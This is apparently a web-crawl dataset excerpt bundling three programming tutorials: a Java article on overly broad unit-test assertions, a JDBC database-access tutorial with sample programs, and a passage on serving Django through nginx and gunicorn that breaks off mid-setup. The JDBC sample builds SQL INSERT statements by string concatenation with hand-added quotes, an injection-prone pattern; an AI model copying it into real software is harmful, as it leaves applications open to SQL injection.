text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
This article is based on Unit Testing in Java, to be published on: Introduction A broad assertion is one that is so scrupulous in nailing down every little detail about the behavior it is checking that it becomes brittle and hides its intent under its overwhelming breadth and depth. When you encounter a broad assertion, it’s hard to say what exactly is it supposed check and, when you step back to observe, that test is probably breaking far more frequently than the average because it’s so picky that any change whatsoever will cause a difference in the expected output. Let’s make this discussion a bit more concrete again by looking at an example test that suffers from this condition. Example The following example is my very own doing. I wrote it some years back as part of a sales presentation tracking system for a medical corporation. The corporation wanted to gather data on how the various sales presentations were carried out by the sales fleet that visited doctors to push their products. Essentially, they wanted a log of which salesman showed which slide of which presentation for how many seconds before moving on. The solution involved a number of components. There was a little plug-in in the actual presentation file, triggering events when starting a new slide show, entering a slide, and so forth—each with a timestamp to signify when that particular event happened. Those events were pushed to a background application that appended them into a log file. Before synchronizing that log file with the centralized server, however, we transformed the log file into another format, preprocessing it a bit to make it easier for the centralized server to chomp the log file and dump the numbers into a central database. Essentially, we calculated the slide durations from timestamps. The object responsible for this transformation was called a LogFileTransformer and, being test-infected as I was, I had written some tests for it. Listing 1 presents one of those tests—the one that suffered from broad assertion—along with the relevant setup. Have a look at it and see if you can detect the broad assertion. Listing 1 Broad assertion makes a test brittle and opaque public class LogFileTransformerTest { private String expectedOutput; private String logFile; @Before public void setUpBuildLogFile() { StringBuilder lines = new StringBuilder(); appendTo(lines, "[2005-05-23 21:20:33] LAUNCHED"); appendTo(lines, "[2005-05-23 21:20:33] session-id###SID"); appendTo(lines, "[2005-05-23 21:20:33] user-id###UID"); appendTo(lines, "[2005-05-23 21:20:33] presentation-id###PID"); appendTo(lines, "[2005-05-23 21:20:35] screen1"); appendTo(lines, "[2005-05-23 21:20:36] screen2"); appendTo(lines, "[2005-05-23 21:21:36] screen3"); appendTo(lines, "[2005-05-23 21:21:36] screen4"); appendTo(lines, "[2005-05-23 21:22:00] screen5"); appendTo(lines, "[2005-05-23 21:22:48] STOPPED"); logFile = lines.toString(); } @Before public void setUpBuildTransformedFile() { StringBuilder file = new StringBuilder(); appendTo(file, "session-id###SID"); appendTo(file, "presentation-id###PID"); appendTo(file, "user-id###UID"); appendTo(file, "started###2005-05-23 21:20:33"); appendTo(file, "screen1###1"); appendTo(file, "screen2###60"); appendTo(file, "screen3###0"); appendTo(file, "screen4###24"); appendTo(file, "screen5###48"); appendTo(file, "finished###2005-05-23 21:22:48"); expectedOutput = file.toString(); } @Test public void transformationGeneratesRightStuffIntoTheRightFile() throws Exception { TempFile input = TempFile.withSuffix(".src.log").append(logFile); TempFile output = TempFile.withSuffix(".dest.log"); new LogFileTransformer().transform(input.file(), output.file()); assertTrue("Destination file was not created", output.exists()); assertEquals(expectedOutput, output.content()); } // rest omitted for clarity } Did you see it? Did you see the broad assertion? You probably did—there are only two assertions in there. But, which of the two is the culprit here, and what makes it too broad? The first assertion checks that the destination file was indeed created. The second assertion checks that the destination file’s content is what’s expected. Now, the value of the first assertion is questionable and it should probably be deleted. However, it’s the second assertion that’s our main concern—the broad assertion: assertEquals(expectedOutput, output.content()); This is quite a relevant assertion in the sense that it verifies exactly what the name of the test implies—that the right stuff ended up in the right file. The problem is really that the test is too broad, resulting in the assertion’s being a wholesale comparison of the whole log file. It’s a thick safety net, that’s for sure, as even the tiniest of changes in the output will fail the assertion. And therein lies the problem. A test that has never failed is of little value—it’s probably not testing anything. In the other end of the spectrum, a test that always fails is a mere nuisance. What we’re looking for is a test that has failed in the past, proving that it is able to catch a deviation from the desired behavior of the code it’s testing and that it will break again if we make such a change to the code it’s testing. The test in our example fails to fulfill this criterion by failing too easily, making it brittle and fragile. But that’s only a symptom of a more fundamental issue—the problem of being a broad assertion. The various small changes in the log file’s format or content that would break this test are valid reasons to fail the test. There’s nothing intrinsically wrong about the assertion. The problem lies in the test’s violation of a fundamental guiding principle for what constitutes a good test: A test should have only one reason to fail. If that principle seems familiar, it’s a variation of a well-known object-oriented design principle, the Single Responsibility Principle, which says, “A class should have one, and only one, reason to change.”1 Now let’s clarify why the principle of having only one reason to fail is so important. Catching many kinds of changes in the generated output is good. However, when the test does fail, we want to know why. In our example it’s quite difficult to tell what happened if this test, transformationGeneratesRightStuffIntoTheRightFile, suddenly breaks. In practice, we’ll always have to look at the details to figure out what had changed and, consequently, broke the test. If the assertion is too broad, many of those details that break the test are in fact irrelevant. How should we go about improving this test, then? What to do about it? The first order of action when encountering an overly broad assertion is to identify irrelevant details and remove them from the test. In our example, we might look at the log file being transformed and try to reduce the number of lines. We want it to represent a valid log file and be elaborate enough for the purposes of the test. For example, our log file has timings for five screens. Maybe two or three would be enough? Could we get by with just one? This question brings us to the next improvement to consider—splitting the test. Asking ourselves how few lines in the log file we could get by with quickly leads to concerns about the test no longer testing this and that. Listing 2 presents one possible solution where each aspect of the log file and its transformation are extracted into separate tests. Listing 2 More relaxed, semantics-oriented assertions reduce brittleness and improve readability public class LogFileTransformerTest { private static final String END = "2005-05-23 21:21:37"; private static final String START = "2005-05-23 21:20:33"; private LogFile logFile; @Before public void setUp() { logFile = new LogFile(START, END); } @Test #1 public void overallFileStructureIsCorrect() throws Exception { StringBuilder expected = new StringBuilder(); appendTo(expected, "session-id###SID"); appendTo(expected, "presentation-id###PID"); appendTo(expected, "user-id###UID"); appendTo(expected, "started###2005-05-23 21:20:33"); appendTo(expected, "finished###2005-05-23 21:21:37"); assertEquals(expected.toString(), transform(logFile.toString())); } @Test #2 public void screenDurationsGoBetweenStartedAndFinished() throws Exception { logFile.addContent("[2005-05-23 21:20:35] screen1"); String out = transform(logFile.toString()); assertTrue(out.indexOf("started") < out.indexOf("screen1")); assertTrue(out.indexOf("screen1") < out.indexOf("finished")); } @Test public void screenDurationsAreRenderedInSeconds() throws Exception { logFile.addContent("[2005-05-23 21:20:35] screen1"); logFile.addContent("[2005-05-23 21:20:35] screen2"); logFile.addContent("[2005-05-23 21:21:36] screen3"); String output = transform(logFile.toString()); assertTrue(output.contains("screen1###0")); assertTrue(output.contains("screen2###61")); assertTrue(output.contains("screen3###1")); } // rest omitted for brevity private String transform(String log) { ... } private void appendTo(StringBuilder buffer, String string) { ... } private class LogFile { ... } } #1 Checks that common headers are placed correctly #2 Checks screen durations' place in the log #3 Checks screen duration calculations The solution above introduces a test helper class, LogFile, which establishes the standard “envelope”—the header and footer—for the log file being transformed based on the given starting and ending timestamps. This allows the second and the third test, screenDurationsGoBetweenStartedAndFinished and screenDurationsAreRenderedInSeconds, to append just the screen durations to the log, making the test more focused and easier to grasp. In other words, we delegate some of the responsibility for constructing the complete log file to LogFile. In order to ensure that that responsibility receives due diligence, the overall file structure is verified by the first test, overallFileStructureIsCorrect, in the context of the simplest possible scenario—an otherwise empty log file. This refactoring has given us more focus by hiding the details from each test that are irrelevant for that particular test. That is also the downside of this approach—some of the details are hidden. In applying this technique, we must ask ourselves what we value more—being able to see the whole in one place or being able to see the essence of a test quickly. I suggest that, most of the time, when speaking of unit tests, the latter is more desirable as the fine-grained, focused tests point us quickly to the root of the problem in case of a test failure. With all tests making assertions against the whole transformed log file, for example, a small change in the file syntax could easily break all of our tests making it more difficult to figure out what exactly broken—where’s the problem? Summary We can shoot ourselves in the proverbial foot by making too broad assertions.. A broad assertion also makes it difficult for the programmer to identify the intent and essence of the test. When you see a test that seems to bite off a lot, ask yourself what exactly do you want to verify? Then, try to formulate your assertion in those terms. Speak Your Mind
http://www.javabeat.net/what-is-broad-assertion-in-unit-testing-in-java/
CC-MAIN-2014-42
refinedweb
1,792
52.7
Este artículo tambíen está en Español. Java Database Connectivity (JDBC) is a programming framework for Java developers writing programs that access information stored in databases, spreadsheets, and flat files. JDBC is commonly used to connect a user program to a "behind the scenes" database, regardless of what database management software is used to control the database. In this way, JDBC is cross-platform [ 1]. This article will provide an introduction and sample code that demonstrates database access from Java programs that use the classes of the JDBC API, which is available for free download from Sun's site [3]. A database that another program links to is called a data source. Many data sources, including products produced by Microsoft and Oracle, already use a standard called Open Database Connectivity (ODBC). Many legacy C and Perl programs use ODBC to connect to data sources. ODBC consolidated much of the commonality between database management systems. JDBC builds on this feature, and increases the level of abstraction. JDBC-ODBC bridges have been created to allow Java programs to connect to ODBC-enabled database software [1]. This article assumes that readers already have a data source established and are moderately familiar with the Structured Query Language (SQL), the command language for adding records, retrieving records, and other basic database manipulations. See Hoffman's tutorial on SQL if you are a beginner or need some refreshing [2]. Regardless of data source location, platform, or driver (Oracle, Microsoft, etc.), JDBC makes connecting to a data source less difficult by providing a collection of classes that abstract details of the database interaction. Software engineering with JDBC is also conducive to module reuse. Programs can easily be ported to a different infrastructure for which you have data stored (whatever platform you choose to use in the future) with only a driver substitution. As long as you stick with the more popular database platforms (Oracle, Informix, Microsoft, MySQL, etc.), there is almost certainly a JDBC driver written to let your programs connect and manipulate data. You can download a specific JDBC driver from the manufacturer of your database management system (DBMS) or from a third party (in the case of less popular open source products) [5]. The JDBC driver for your database will come with specific instructions to make the class files of the driver available to the Java Virtual Machine, which your program is going to run. JDBC drivers use Java's built-in DriverManager to open and access a database from within your Java program. To begin connecting to a data source, you first need to instantiate an object of your JDBC driver. This essentially requires only one line of code, a command to the DriverManager, telling the Java Virtual Machine to load the bytecode of your driver into memory, where its methods will be available to your program. The String parameter below is the fully qualified class name of the driver you are using for your platform combination: Class.forName("org.gjt.mm.mysql.Driver").newInstance(); To actually manipulate your database, you need to get an object of the Connection class from your driver. At the very least, your driver will need a URL for the database and parameters for access control, which usually involves standard password authentication for a database account. As you may already be aware, the Uniform Resource Locator (URL) standard is good for much more than telling your browser where to find a web page: The URL for our example driver and database looks like this: jdbc:mysql://db_server:3306/contacts/ Even though these two URLs look different, they are actually the same in form: the protocol for connection, machine host name and optional port number, and the relative path of the resource. Your JDBC driver will come with instructions detailing how to form the URL for your database. It will look similar to our example. You will want to control access to your data, unless security is not an issue. The standard least common denominator for authentication to a database is a pair of strings, an account and a password. The account name and password you give the driver should have meaning within your DBMS, where permissions should have been established to govern access privileges. Our example JDBC driver uses an object of the Properties class to pass information through the DriverManager, which yields a Connection object: Properties props = new Properties(); props.setProperty("user", "contacts"); props.setProperty("password", "blackbook"); Connection con = DriverManager.getConnection( "jdbc:mysql://localhost:3306/contacts/", props); Now that we have a Connection object, we can easily pass commands through it to the database, taking advantage of the abstraction layers provided by JDBC. Databases are composed of tables, which in turn are composed of rows. Each database table has a set of rows that define what data types are in each record. Records are also stored as rows of the database table with one row per record. We use the data source connection created in the last section to execute a command to the database. We write commands to be executed by the DBMS on a database using SQL. The syntax of a SQL statement, or query, usually consists of an action keyword, a target table name, and some parameters. For example: INSERT INTO songs VALUES ( "Jesus Jones", "Right Here, Right Now"); INSERT INTO songs VALUES ( "Def Leppard", "Hysteria"); These SQL queries each added a row of data to table "songs" in the database. Naturally, the order of the values being inserted into the table must match the order of the corresponding columns of the table, and the data types of the new values must match the data types of the corresponding columns. For more information about the supported data types in your DBMS, consult your reference material. To execute an SQL statement using a Connection object, you first need to create a Statement object, which will execute the query contained in a String. Statement stmt = con.createStatement(); String query = ... // define query stmt.executeQuery(query); In the course of modernizing a record keeping system, you encounter a flat file of data that was created long before the rise of the modern relational database. Rather than type all the data from the flat file into the DBMS, you may want to create a program that reads in the text file, inserting each row into a database table, which has been created to model the original flat file structure. In this case, we examine a very simple text file. There are only a few rows and columns, but the principle here can be applied and scaled to larger problems. There are only a few steps: Here is the code of the example program: import java.io.*; import java.sql.*; import java.util.*; public class TextToDatabaseTable { private static final String DB = "contacts", TABLE_NAME = "records", HOST = "jdbc:mysql://db_lhost:3306/", ACCOUNT = "account", PASSWORD = "nevermind", DRIVER = "org.gjt.mm.mysql.Driver", FILENAME = "records.txt"; public static void main (String[] args) { try { // connect to db Properties props = new Properties(); props.setProperty("user", ACCOUNT); props.setProperty("password", PASSWORD); Class.forName(DRIVER).newInstance(); Connection con = DriverManager.getConnection( HOST + DB, props); Statement stmt = con.createStatement(); // open text file BufferedReader in = new BufferedReader( new FileReader(FILENAME)); // read and parse a line String line = in.readLine(); while(line != null) { StringTokenizer tk = new StringTokenizer(line); String first = tk.nextToken(), last = tk.nextToken(), email = tk.nextToken(), phone = tk.nextToken(); // execute SQL insert statement String query = "INSERT INTO " + TABLE_NAME; query += " VALUES(" + quote(first) + ", "; query += quote(last) + ", "; query += quote(email) + ", "; query += quote(phone) + ");"; stmt.executeQuery(query); // prepare to process next line line = in.readLine(); } in.close(); } catch( Exception e) { e.printStackTrace(); } } // protect data with quotes private static String quote(String include) { return("\"" + include + "\""); } } Perhaps even more often than inserting data, you will want to retrieve existing information from your database and use it in your Java program. The usual way to implement this is with another type of SQL query, which selects a set of rows and columns from your database and appears very much like a table. The rows and columns of your result set will be a subset of the tables you queried, where certain fields match your parameters. For example: SELECT title FROM songs WHERE artist="Def Leppard"; This query returns: The boxed portion above is a sample result set from a particular database program. In a Java program, this SQL statement can be executed in the same way as in the insert example, but additionally, we must capture the results in a ResultSet object. Statement stmt = con.createStatement(); String query = "SELECT FROM junk;"; // define query ResultSet answers = stmt.executeQuery(query); The JDBC version of a query result set has a cursor that initially points to the row just before the first row. To advance the cursor, use the next() method. If you know the names of the columns from your result set, you can refer to them by name. You can also refer to the columns by number, starting with 1. Usually you will want to get access all of the rows of your result set, using a loop as in the following code segment: All database tables have meta data that describe the names and data types of each column; result sets are the same way. You can use theAll database tables have meta data that describe the names and data types of each column; result sets are the same way. You can use thewhile(answers.next()) { String name = answers.getString("name"); int number = answers.getInt("number"); // do something interesting } ResultSetMetaDataclass to get the column count and the names of the columns, like so: ResultSetMetaData meta = answers.getMetaData(); String[] colNames = new String[meta.getColumnCount()]; for (int col = 0; col < colNames.length; col++) colNames[col] = meta.getColumnName(col + 1); We choose to write a simple software tool to show the rows and columns of a database table. In this case, we are going to query a database table for all its records, and display the result set to the command line. We could also have created a graphical front end made of Java Swing components. Notice that we do not know anything except the URL and authentication information to the database table we are going to display. Everything else is determined from the ResultSet and its meta data. Comments in the code explain the actions of the program. Here is the code of the example program: import java.sql.*; import java.util.*; public class DatabaseTableViewer { private static final String DB = "contacts", TABLE_NAME = "records", HOST = "jdbc:mysql://db_host:3306/", ACCOUNT = "account", PASSWORD = "nevermind", DRIVER = "org.gjt.mm.mysql.Driver"; public static void main (String[] args) { try { // authentication properties Properties props = new Properties(); props.setProperty("user", ACCOUNT); props.setProperty("password", PASSWORD); // load driver and prepare to access Class.forName(DRIVER).newInstance(); Connection con = DriverManager.getConnection( HOST + DB, props); Statement stmt = con.createStatement(); // execute select query String query = "SELECT * FROM " + TABLE_NAME + ";"; ResultSet table = stmt.executeQuery(query); // determine properties of table ResultSetMetaData meta = table.getMetaData(); String[] colNames = new String[meta.getColumnCount()]; Vector[] cells = new Vector[colNames.length]; for( int col = 0; col < colNames.length; col++) { colNames[col] = meta.getColumnName(col + 1); cells[col] = new Vector(); } // hold data from result set while(table.next()) { for(int col = 0; col < colNames.length; col++) { Object cell = table.getObject(colNames[col]); cells[col].add(cell); } } // print column headings for(int col = 0; col < colNames.length; col++) System.out.print(colNames[col].toUpperCase() + "\t"); System.out.println(); // print data row-wise while(!cells[0].isEmpty()) { for(int col = 0; col < colNames.length; col++) System.out.print(cells[col].remove(0).toString() + "\t"); System.out.println(); } } // exit more gently catch(Exception e) { e.printStackTrace(); } } } In this article, you saw a quick introduction to manipulating databases with JDBC. More advanced features of JDBC require a greater knowledge of databases. See the references for more articles about JDBC and its applications [4]. As a Java programmer, JDBC is a good tool to have in your arsenal. I encourage you to copy the code in this article to your own computer. With this article and documentation for another JDBC driver, you are on your way to creating data source-driven Java programs. Experiment with this code, and adapt it to connect to data sources available to you.
http://www.acm.org/crossroads/columns/ovp/march2001.html
crawl-001
refinedweb
2,034
56.45
Hi, So i have a custom component with several source files (.h and .c), i would like to limit the inclusion of some of this files on the projects depending of one of the component parameters. It's similar to how the SCB component work, depending on the chosen option (SPI, I2C, UART, etc.) the header and source files of the chosen option are included and the others header and source files are not included. I had read the custom component author documentation but could not find information on how to do this. Does anyone know if it's possible? I'm using Creator 4.1 if that helps. Thanks in advance You will just need to enter some #if in your component API files to control the including of the required .h files. Bob No doubt the #if logic will for sure work with the .h files, but can something similar be done to selectively make a .c file part of the project ? Hi, thats a good idea for including .h files, actually it is how the header files for different peripherals of the SCB block are included. From the SCB.h file: #if (`$INSTANCE_NAME`_SCB_MODE_I2C_INC) #include "`$INSTANCE_NAME`_I2C_PVT.h" #endif /* (`$INSTANCE_NAME`_SCB_MODE_I2C_INC) */ #if (`$INSTANCE_NAME`_SCB_MODE_EZI2C_INC) #include "`$INSTANCE_NAME`_EZI2C_PVT.h" #endif /* (`$INSTANCE_NAME`_SCB_MODE_EZI2C_INC) */ #if (`$INSTANCE_NAME`_SCB_MODE_SPI_INC || `$INSTANCE_NAME`_SCB_MODE_UART_INC) #include "`$INSTANCE_NAME`_SPI_UART_PVT.h" #endif /* (`$INSTANCE_NAME`_SCB_MODE_SPI_INC || `$INSTANCE_NAME`_SCB_MODE_UART_INC) */ but as tonyL says it doesn't seem help for .c files.
https://community.cypress.com/thread/9880
CC-MAIN-2017-47
refinedweb
240
59.7
This is your resource to discuss support topics with your peers, and learn from each other. 09-14-2013 03:48 PM I can't seem to be able to change the wifi state. I can read the state of the wifi though. I saw in a previous post that this was not possible. Is it still impossible? 09-14-2013 04:59 PM - edited 09-14-2013 05:01 PM This seems to imply that it will turn the wifi on I'm not sure if it will work as it says it starts it in STA mode and I have no idea what that means but It's the only thing I noticed about turning the wifi on and off here's other wifi related info If this doesnt do the trick I would suggest submitting a Jira ticket 09-14-2013 11:18 PM Actually that's an enum to know the status of the wifi radio. This Will let you change the status of the wifi. My code is #include "WifiController.hpp" #include <wifi/wifi_service.h> #include "GeoNotification.hpp" WifiController::WifiController() {} WifiController::~WifiController() {} int WifiController::toggleWifiState(bool state) { getWifiState(); int status = wifi_set_sta_power(state); if(status==WIFI_SUCCESS) qDebug()<<"WIFI ENABLE SUCCESS CURRENT STATE: "<<state; else qDebug()<<"WIFI ENABLE FAILURE CURRENT STATE: "<<state; return status; } int WifiController::getWifiState() { wifi_status_t status; wifi_get_status(&status); if(status == WIFI_STATUS_BUSY) { return 2; } if(status == WIFI_STATUS_RADIO_ON) { return 1; } if(status == WIFI_STATUS_RADIO_OFF) { return 0; } return 0; } I call the toggleWifiState() function to change the wifi state. But it doesn't work I am stuck on this problem for a long time. 09-15-2013 06:10 AM That would be the code from the link I posted, appears that it does work =) 09-15-2013 06:17 AM 09-15-2013 06:20 AM That would likely mean that STA mode isn't regular wifi, and your best bet would be to file a feature request ticket on jira
https://supportforums.blackberry.com/t5/Native-Development/Is-it-currently-possible-to-toggle-wifi-state-programmatically/m-p/2589733
CC-MAIN-2016-44
refinedweb
324
58.21
Python client wrapper library for WSDL API This project received 11 bids from talented freelancers with an average bid price of $1134 USD.Get free quotes for a project like this Skills Required Project Budget$750 - $1500 USD Total Bids11 Project Description The output of this project should be a python 2.7 module that can be imported by any other python script or module that wraps a specific WSDL API from the below SaaS provider. The module should contain a class that is built to handle all interactions with the WSDL interface, including automatically taking care of authentication and session management. The class should have simple calls that match up to the WSDL API interface. Note that the below SaaS provider has broken up the WSDL interface into multiple WSDL definitions, and all must be accessible via the module/class. The class should also be easily extendable as new functions are defined or new WSDL interfaces are defined. Data retrieved from the WSDL APIs must be made available via memory object using standard python 2.7 data structures to be used in the calling python script/module to be used for further data processing. [url removed, login to view] The final product should be constructed in such a way that the library could be used to talk to the hosted solution or a privately hosted copy of the code. (i.e. be able to define the namespace and URL to access the namespace) The use of GPL/GNU or other open source licensing for WSDL or XML support is encouraged and allowed. All works done on this project must also carry a GPL license for redistribution. All source code and working examples must be delivered for acceptance of the project. Examples should include: -setting authentication and namespace -retrieving a list of Employees, Clients, Projects and Tasks -retrieving a list of time entries by date range and by date range/employeeID The developer should signup for a trial account to the TimeLive hosted solution to test and build this
https://www.freelancer.com/jobs/Python-Engineering/Python-client-wrapper-library-for/
CC-MAIN-2015-22
refinedweb
339
55.98
React Redux: As the name suggests it’s a javascript library created by Facebook and it is the most popular javascript library and used for building l User Interfaces(UI) specifically for single-page applications. React js enables the developer to break down complicated UI into a simpler one. We can make particular changes in data of web applications without refreshing the page. React allows creating reusable components. Advantages of React js Easy to learn and Easy to use: React is easy to learn and simple to use and comes with lots of good paperwork, tutorials, and training resources. You can use plain JavaScript to create a web application and then handle it using this. It is also known as the V in the MVC (Model View Controller) pattern. Virtual DOM: Virtual DOM is a memory-representation of Real DOM(Document Object Model). A virtual DOM is a lightweight JavaScript object that is originally just a copy of Real DOM. It helps to improve performance and thus the rendering of the app is fast. CodeReability increases with JSX: JSX stands for javascript XML.This is a sort of file used by React which utilizes javascript expressiveness along with HTML like template syntax.JSX makes your code simple and better. Reusable Components: Each component has its logic and controls its own rendering and can be reused wherever you need it. Component reusability helps to create your application simpler and increases performance. Need for React Redux: 1) The core problem with React js is state Management. 2) There may be the same data to display in multiple places. Redux has a different approach, redux offers a solution storing all your application state in one place called store. The component then dispatch state changes to the store not directly to the component. What is Redux?? Redux is a predictable state container for javascript applications. It helps you write applications that behave consistently and run in different environments and are easy to test. Redux mostly used for state Management. Advantages of Using Redux Redux makes state Predictable: In redux the state is Predictable when same state and action passed to a reducer. Its always produce same the same result. since reducers are pure functions. The state is also unchangeable and never changed. This allow us for arduous task such as infinite redo and undo. Maintainability: Redux is strict about how code should be organized, which makes understanding the structure of any redux application easier for someone with redux knowledge. This generally makes the maintenance easier. Ease of testing: Redux apps can be easily tested since functions are used to change the state of pure functions. Redux-data flow (diagram) Redux is composed of the following components: Action Reducer Store View Action: Actions are the payload of information that sends data from your application to your store. Actions describe the fact that something happens but do not specify how the application state changes in the response. Action must have a type property that indicates types of action being performed they must be defined as a string constant. Action-type: export const ADD_ITEM=’ADD_ITEM, Action-creator: import * as actionType from ‘./action-types’ function addItem(item) { return { type: actionType.ADD_ITEM, payload:item } } Reducer: Reducer is a pure function which specifies how application state change in response to an action. Reducer handle action dispatch by the component. Reducer takes a previous state and action and returns a new state. Reducer does not manipulate the original state passed to them but make their own copies and update them. function reducer(state = initialState, action) { switch (action.type) { case ‘ADD_ITEM’: return Object.assign({}, state, { items: [ …state.items, { item: action.payload } ] }) default: return state } } Things you should never do inside a reducer Mutate its arguments Perform side effects like API calls Calling non-pure functions Like Math.random() Store A store is an object that brings all components to work together. It calculates state changes and then notifies the root reducer about it. Store keeps the state of your whole application. It makes the development of large applications easier and faster. Store is accessible to each component import { createStore } from ‘redux’ import todoApp from ‘./reducers’ let store = createStore(reducer); View: The only purpose of the view is to display the data passed by the store. Conclusion:- So coming to the conclusion why we should use React with Redux is because redux solves the state management problem. Redux offers solutions storing your whole application state in a single place that you can say it central store which is accessible to each component. React Native App Development Company React Native Development Company Outsource React Native Development Company Discussion (0)
https://dev.to/ashikacronj/react-redux-a-complete-guide-to-beginners-2a45
CC-MAIN-2021-25
refinedweb
775
57.37
Produce the highest quality screenshots with the least amount of effort! Use Window Clippings. The Windows SDK provides the WideCharToMultiByte function to convert a Unicode, or UTF-16, string (WCHAR*) to a character string (CHAR*) using a particular code page. Windows also provides the MultiByteToWideChar function to convert a character string from a particular code page to a Unicode string. These functions can be a bit daunting at first but unless you have a lot of legacy code or APIs to deal with you can just specify CP_UTF8 as the code page and these functions will convert between Unicode UTF-16 and UTF-8 formats. UTF-8 isn’t really a code page in the original sense but the API functions lives on and now provide support for UTF conversions. ATL provides a set of class templates that wrap these functions to simplify conversions even further. It takes a fairly efficient and elegant approach to memory management (compared to previous versions of ATL) that should serve you well in most cases. CW2A is a typedef for the CW2AEX class template that wraps the WideCharToMultiByte function. Similarly, CA2W is a typedef for the CA2WEX class template that wraps the MultiByteToWideChar function. In the example below I start with a Unicode string that includes the Greek capital letters for Alpha and Omega. The string is converted to UTF-8 with CW2A and then back to Unicode with CA2W. Be sure to specify CP_UTF8 as the second parameter in both cases otherwise ATL will use the current ANSI code page. Keep in mind that although UTF-8 strings look like characters strings, you cannot rely on pointer arithmetic to subscript them as the characters may actually consume anywhere from one to four bytes. It’s also possible that Unicode characters may require more than two bytes should they fall in a range above U+FFFF. In general you should treat user input as opaque buffers. #include <atlconv.h>#include <atlstr.h> #define ASSERT ATLASSERT int main(){ const CStringW unicode1 = L"\x0391 and \x03A9"; // 'Alpha' and 'Omega' const CStringA utf8 = CW2A(unicode1, CP_UTF8); ASSERT(utf8.GetLength() > unicode1.GetLength()); const CStringW unicode2 = CA2W(utf8, CP_UTF8); ASSERT(unicode1 == unicode2);} If you’re looking for one of my previous articles here is a complete list of them for you to browse through. its not like UTF16 is always 2bytes either asdf: Thanks I forgot to mention that. I updated the text to point that out.
http://weblogs.asp.net/kennykerr/archive/2008/07/24/visual-c-in-short-converting-between-unicode-and-utf-8.aspx
crawl-002
refinedweb
408
60.24
FH: You walk over the AST with a function that has the signature "IronJS.Ast -> System.Linq.Expressions.Expression". It basically transforms the internal AST nodes into the equivalent DLR ones. FH: It's a superset, or rather an evolution, of the 3.5 version. FH: Yes FH: If you run IronJS on a pre-4.0 version then you need to include the proper assemblies which can be downloaded and compiled from dlr.codeplex.com and all the same types will exist as in 4.0, just under a different namespace. FH: IronJS itself doesn’t really come with a pre-defined use-case, I would say that anywhere you would like users of your application to be able to do their own scripting. I know of a few people that have used it together with ASP.NET/MVC to both create view templates and some sort of ".net-nodejs-hybrid". FH: Currently, no, there are a few low level things IronJS does which are not allowed in SL. FH: It would not help against XSS, as this has nothing to do with the runtime itself, and with the quality of today's JavaScript runtimes I don't think there would be a huge benefit to run IronJS in the browser. FH: IronJS uses the .NET GC. FH: It cannot, sadly. FH: There is nothing stopping you from exposing LINQ to IronJS manually, but it's not supported out of the box. Also, what it would mean to have Linq in IronJS? Not that much I think. Maybe I sound negative but JavaScript as a language is not very concise when using lambdas, etc. FH: Yes they are faster, no doubt. FH: The parsing is still in F#, it's the core runtime classes that represent the JS environment that has been moved to C#. This was done by John Gietzen who contributed a lot of code and it was done because it's easier for other people to inter-op with them. FH: Yes, I am. FH: Honestly my contact with Microsoft and the trust in the quality of the code the DLR team put out. Also the DLR had been proven with IronRuby and IronPython. Nothing bad against Parrot though, as I have never even spoken to them. IronJS on github IronJS Blog Parrot virtual machine Homes found for Iron languages Microsoft lets go of Iron languages Microsoft's Dynamic languages are dying To be informed about new articles on I Programmer, install the I Programmer Toolbar, subscribe to the RSS feed, follow us on, Twitter, Facebook, Google+ or Linkedin, or sign up for our weekly newsletter.
http://www.i-programmer.info/professional-programmer/i-programmer/4482.html?start=1
CC-MAIN-2013-48
refinedweb
440
72.16
The. In this part of the post, I would like to document the steps needed to run an existing Django project on gunicorn as the backend server and nginx as the reverse proxy server. (Please refer to Part 1 of this post) Disclaimer: this post is based on this site but I added a lot of details that wasn't explained. Setup nginx Before starting the nginx server, we want modify its config file. I installed nginx via brew on my machine, and the conf file is located here: /usr/local/etc/nginx/nginx.conf We can modify this file directly to add configurations for our site, but this is not a good idea. Because you may have multiple web apps running behind this nginx server. Each web app may need its own configuration. To do this, let's create another folder for storing these site-wise configuration files first: cd /usr/local/etc/nginx mkdir sites-enabled We can store our site specific config here but wouldn't it be better if we store the config file along with our project files together? Now, let's navigate to our project folder. (I named my project testproject and stored it under /Users/webapp/Apps/testproject) cd /Users/webapp/Apps/testproject touch nginx.conf Here is my config file: server { listen 80; server_name your_server_ip; access_log /Users/webapp/logs/access.log; # <- make sure to create the logs directory error_log /Users/webapp/logs/error.log; # <- you will need this file for debugging location / { proxy_pass; # <- let nginx pass traffic to the gunicorn server } location /static { root /Users/webapp/Apps/testproject/vis; # <- let nginx serves the static contents } } Let me elaborate on the '/static' part. This part means that any traffic to 'your_server_ip/static' will be forwarded to '/Users/webapp/Apps/testproject/vis/static'. You might ask why doesn't it forward to '/Users/webapp/Apps/testproject/vis'?(without '/static' in the end) Because when using 'root' in the config, it will append the '/static' part after it. So be aware! You can fix this by using alias instead of root and append /static to the end of the path: location /static { alias /Users/webapp/Apps/testproject/vis/static; } Here is the folder structure of my project : /Users/webapp/Apps/testproject/ manage.py <- the manage.py file generated by Django nginx.conf <- the nginx config file for your project gunicorn.conf.py <- the gunicorn config file that we will create later, just keep on reading testproject/ <- automatically generated by Django settings.py urls.py wsgi.py <- automatically generated by Django and used by gunicorn later vis/ <- the webapp that I wrote admin.py models.py test.py urls.py template/ vis/ index.html static/ <- the place where I stored all of the static files for my project vis/ css/ images/ js/ All of the static files are in the /testproject/vis/static folder, so that's where nginx should be looking. You might ask that the static files live in their own folders rather than right under the /static/ path. How does nginx know where to fetch them? Well, this is not nginx's problem to solve. It is your responsibility to code the right path in your template. This is what I wrote in my template/vis/index.html page: href="{% static 'vis/css/general.css' %} It is likely that you won't get the path right the first time. But that's ok. Just open up Chrome's developer tools and look at the error messages in the console to see which part of the path is messed up. Then, either fix your nginx config file or your template. To let nginx read our newly create config file: cd /usr/local/etc/nginx/ nano nginx.conf Find the ' http { ' header, add this line under it: http{ include /usr/local/etc/nginx/sites-enabled/*; This line tells nginx to look for config files under the 'sites-enabled' folder. Instead of copy our project's nginx.conf into the 'sites-enabled' folder, we can simply create a soft link instead: cd /usr/local/etc/nginx/site-enabled ln -s /full_path/to/your/django_project a_name # in my case, this is what my link command looks like: # ln -s /Users/webapp/Apps/testproject/nginx.conf testproject # this would create a soft link named testproject which points to the real config file Once this is done, you can finally start up the nginx server: To start nginx, use sudo nginx To stop it, use sudo nginx -s stop To reload the config file without shutting down the server: sudo nginx -s reload Please refer to this page for a quick overview of the commands. Setup gunicorn Setting up gunicorn is more straight forward (without considering optimization). First, let's write a config file for gunicorn. 